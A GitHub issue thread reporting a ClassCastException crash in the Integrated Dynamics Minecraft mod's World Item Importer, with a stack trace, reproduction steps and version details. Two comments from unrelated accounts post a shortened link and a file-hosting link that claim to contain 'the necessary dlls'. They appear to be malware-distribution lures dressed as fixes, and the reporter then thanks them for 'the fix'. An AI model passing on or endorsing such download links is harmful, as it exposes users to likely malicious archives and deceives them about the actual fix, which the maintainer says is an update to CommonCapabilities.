### ISSUE TITLE
World Item Importer crash: `class net.minecraft.core.Direction cannot be cast to class java.lang.Void` 

### ISSUE THREAD

**Issue by andrewjbennett** [CyclopsMC/IntegratedDynamics#1395]
#### Issue type:

- :bug: Bug 

____

#### Short description:

Crash when using the World Item Importer

`java.lang.ClassCastException: class net.minecraft.core.Direction cannot be cast to class java.lang.Void` 

The stack trace includes:

```
at org.cyclops.commoncapabilities.api.ingredient.capability.ICapabilityGetter$3.getCapability(ICapabilityGetter.java:62) ~[CommonCapabilities-1.20.4-neoforge-2.9.1.jar%23485!/:2.9.1] {re:classloading}
```

Which maybe means this is the same bug as #1376?

I'm playing a slightly modified version of FTB NeoTech.

---

The crash happens when e.g. you place a mob wearing armor on top of / next to a world item importer, so presumably when it tries to import their items.

#### Steps to reproduce the problem:

1. Place some World Item Importers down, in a way where they're both below and beside a space to stand
2. Put variable cards in, for the slot which imports all items from entities
3. Place a chest, add an item interface, connect everything with pipes
4. Put an entity in the space you've left to stand in

#### Expected behaviour:

It sucks their armor off and items being held off, and puts them into the chests

____

#### Versions:

- This mod: `IntegratedDynamics-1.20.4-neoforge-1.21.8.jar`
- Minecraft: 1.20.4
- Mod loader version: NeoForge 20.4.237

#### Log file:

[crash-2024-09-19_21.59.01-server.txt](https://github.com/user-attachments/files/17057340/crash-2024-09-19_21.59.01-server.txt)

**Comment by rubensworks** [comment]
Thanks for reporting!

**Comment by achilles0x** [comment]
download
https://bit.ly/3XQLHlH
I put the necessary dlls in the archive

**Comment by nourakhy** [comment]
maybe this will help

https://mega.nz/file/1vkGlJTL#yU-SJLlIilF0mx5qwpPOd3BM8iKZqOJLEQUStR76rrQ
I put the necessary dlls in the archive

**Comment by andrewjbennett** [comment]
Thank you for the fix! How can I use it in my game, do I need to wait for a new neoforge release of IntegratedDynamics or CommonCapabilities? (or both?)

**Comment by rubensworks** [comment]
Just a new update of CommonCapabilities is needed.
